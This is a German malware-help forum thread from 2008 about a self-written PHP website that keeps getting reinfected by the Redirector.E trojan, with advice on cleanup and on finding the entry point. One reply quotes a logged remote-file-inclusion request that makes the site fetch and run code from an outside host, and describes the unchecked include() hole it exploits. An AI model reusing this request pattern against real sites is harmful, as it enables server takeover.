Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Redirector.E auf Server nicht totzubekommen

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 03.03.2008, 19:55   #1
DenisM
 
Redirector.E auf Server nicht totzubekommen - Standard

Redirector.E auf Server nicht totzubekommen



Hi @ll!

Auf meiner Internetseite h**p://www.philadb.com melden die Besucher seit kurzem ein Anschlagen des Virenscanners auf den Trojaner Redirector.E, der sich offenbar auf der Seite befindet.

Nun habe ich (nach dem Zusammenkratzen des sehr spärlichen Wissens um diesen Trojaner (auch hier im Forum einmal erwähnt)), die check.js gesucht und den Ordner, der sie samt 2-3 anderen Dateien enthielt, gefunden und vom Server gelöscht, alle *.css und *.js Dateien abgeändert und neu hochgeladen. Für einen Abend ist dann Ruhe, die Dateien werden nicht verändert, selbst wenn ich sie zur Kontrolle runterlade und angucke.

Bringt alles nichts, einen Tag später ist der Ordner mit der check.js wieder da und alle css und js Dateien wieder infiziert.

Dieses Prozedere habe ich schon 4-5 Male durchgeführt, und immer kehrt der Trojaner zurück.

Um eine Infektion durch das FTP Programm auszuschließen, habe ich meinen PC gescannt und alle Trojanerreste entfernt, bevor ich mich neu eingeloggt habe (ZoneAlarm Professional Virenscanner und Firewall, aktualisiert, sind beim Betreten des FTP's an gewesen) und die Dateien entfernt/ersetzt habe. Da ich auch gelesen habe, dass der Trojaner gern über FTP infiziert, wenn er einmal das Passwort kennt, habe ich das Passwort umgehend geändert. Bringt aber auch nichts.

Da die Seite selbst geschrieben ist, könnte evtl. eine Sicherheitslücke in den php-Dateien die Trojanerinfektion auslösen, obwohl ich mich bemüht habe, alle Sicherheitslücken auszuschließen. Ich kann auch keine finden.

Weiss jemand von euch, wie man diesen Trojaner dingfest machen könnte bzw. über welche Wege der einen Server infiziert (so dass man diese Wege zumachen kann)?

Wäre euch sehr dankbar für eine Hilfe!

Gruss
DenisM

Alt 05.03.2008, 16:44   #2
maxl
 
Redirector.E auf Server nicht totzubekommen - Standard

Redirector.E auf Server nicht totzubekommen



Hallo!

Da möchte ich mich gleich anschließen, denn das gleiche Problem habe ich auch!

[edit]
bitte eröffne, wie jeder andere hier auch, für dein problem einen eigenen beitrag
nur so wird sichergestellt, das jedem user übersichtlich und individuell geholfen werden kann

danke
GUA
[/edit]
__________________


Alt 07.03.2008, 10:53   #3
rudibreit
 
Redirector.E auf Server nicht totzubekommen - Reden

Redirector.E auf Server nicht totzubekommen



Hatte ich auch. Allerdings haben Anrufe beim Webhoster nichts gebracht. Bin nun drauf gestoßen, dass in meiner CSS-Datei unten so viele Leerzeilen drin waren. Allerdings waren die nicht leer, sondern fieserweise waren die nach rechts eingerückt und irgendein Code mit drin. Da steht wohl alles drin, das der Virus braucht, um geladen zu werden und evtl. sich neu reinzuschreiben.

Checkt Eure CSS-Dateien und auch alle js-Dateien. Kann sein, dass die alle verseucht sind. zur Sicherheit würde ich auch noch Passwörter neu vergeben, kann nicht schaden.

Wollen wir mal hoffen, dass es sauber bleibt.

__________________

Alt 15.03.2008, 19:49   #4
highbiker
 
Redirector.E auf Server nicht totzubekommen - Standard

Redirector.E auf Server nicht totzubekommen



Hallo DenisM,

ich hatte auf meinem Server ebenfalls diesen Virus und habe ihn letztendlich beseitigen können.

Bei mir infizierte er die Homepage über eine alte, schlecht programmierte Unterseite. Ich übergab dort Pfade zu php-Dateien über die URL (per GET) und ließ sie dann durch include() in die Hauptseite einfügen ohne den Pfad vorher zu prüfen.
Übergibt der Angreifer anstatt meines Pfades "http://angriffserver../virus.php", so wird diese auf meinem Server ausgeführt und hat vollen Zugriff.

genaue Beschreibung auf php echo md5 just_a_test : safe_http gegen http-Inject Code

Wie habe ich die Schwachstelle gefunden?
Nachdem ich wiederum den gesamten Virus und alle .css und .js Dateien neu hochgeladen hatte, habe ich mich auf die Lauer gelegt und gewartet bis der Virus wieder da war (Alle 3 Stunden nachgeschaut, außer Nachts).
Als der Plagegeist wieder da war, habe ich mir sofort die log-Files (Darin sind die Zugriffe auf deine Seite gespeichert) angesehen und diesen Eintrag gefunden:
"GET /Inhalte/Alpencross/2005_end/index.php?dir=&file=http%3A%2F%2Fwww.eloge-du-bien-commun.be
%2Fblog%2Fbundled-libs%2FNet%2Focoqen%2Fxuxuyi%2Fa%2F"

(Die Angriffseite scheint selbst ein Opfer zu sein, da die Domainnamen von Angriff zu Angriff variieren).

Nachdem ich die Schwachstelle gefunden habe, war es ein leichtes diese zu schließen (gibt genügend Anleitungen im Netz wie man include-Angriffe abwehrt). Ich bekomme jetzt immer eine e-mail, wenn es der Angreifer wieder versucht (10 emails pro Tag). Durchkommen kann er aber nicht mehr.

Hoffe, dass du diese Antwort nicht mehr benötigst, wenn doch, dann wünsche ich dir viel Erfolg bei der Beseitigung des Viruses.

Gruß
highbiker

Antwort

Themen zu Redirector.E auf Server nicht totzubekommen
besucher, dateien, entfernt, firewall, forum, ftp, gelöscht, gesucht, infektion, internetseite, neu, nichts, ordner, passwort, professional, programm, scan, seite, server, sicherheitslücke, trojaner, verändert, zonealarm




Ähnliche Themen: Redirector.E auf Server nicht totzubekommen


  1. Tencent nicht deinstallierbar + AMWB Server nicht erreichbar
    Plagegeister aller Art und deren Bekämpfung - 17.03.2015 (15)
  2. Trojan.RS.Redirector.BMV
    Plagegeister aller Art und deren Bekämpfung - 13.01.2015 (7)
  3. Windows 7: Viele Webseiten sporadisch nicht aufrufbar oder langsam, Google Earth findet Server nicht
    Log-Analyse und Auswertung - 12.12.2013 (17)
  4. Eine bestimmte Internet Seite kann nicht geöffnet werden (Server nicht gefunden) am vorherigen PC gings über Ausnahmeregel
    Alles rund um Windows - 30.05.2013 (3)
  5. js:Redirector-ACH
    Plagegeister aller Art und deren Bekämpfung - 25.11.2012 (0)
  6. JS/Redirector.SY.1 auf Windows7
    Log-Analyse und Auswertung - 15.08.2012 (20)
  7. JS/Redirector.WH
    Log-Analyse und Auswertung - 10.08.2012 (37)
  8. Redirector Adware Tracking Cookie krieg ich nicht gelöscht microsoft SE von rundll 32 geblockt
    Log-Analyse und Auswertung - 05.07.2012 (27)
  9. JS/Redirector.GZ.1 - Was ist das ?
    Plagegeister aller Art und deren Bekämpfung - 19.07.2011 (1)
  10. JS/Redirector.455
    Plagegeister aller Art und deren Bekämpfung - 31.01.2010 (4)
  11. JS/Redirector.455
    Plagegeister aller Art und deren Bekämpfung - 05.01.2010 (38)
  12. Wie? Wo? Was? JS/Redirector.455!
    Plagegeister aller Art und deren Bekämpfung - 05.11.2009 (3)
  13. JS:Redirector H2 [tr]
    Plagegeister aller Art und deren Bekämpfung - 17.05.2009 (5)
  14. Ftp server (Filezilla / Quick n´easy FTP server lite)
    Alles rund um Windows - 10.01.2009 (7)
  15. buttons lassen sich nicht öffnen download funktioniert nicht server nicht gefunden
    Log-Analyse und Auswertung - 14.11.2008 (1)
  16. TR/Redirector.E
    Plagegeister aller Art und deren Bekämpfung - 12.11.2008 (3)
  17. Google Toolbar funktioniert nicht mehr... Server nicht gefunden!
    Log-Analyse und Auswertung - 08.11.2005 (2)

Zum Thema Redirector.E auf Server nicht totzubekommen - Hi @ll! Auf meiner Internetseite h**p://www.philadb.com melden die Besucher seit kurzem ein Anschlagen des Virenscanners auf den Trojaner Redirector.E, der sich offenbar auf der Seite befindet. Nun habe ich (nach - Redirector.E auf Server nicht totzubekommen...
Archiv
Du betrachtest: Redirector.E auf Server nicht totzubekommen auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.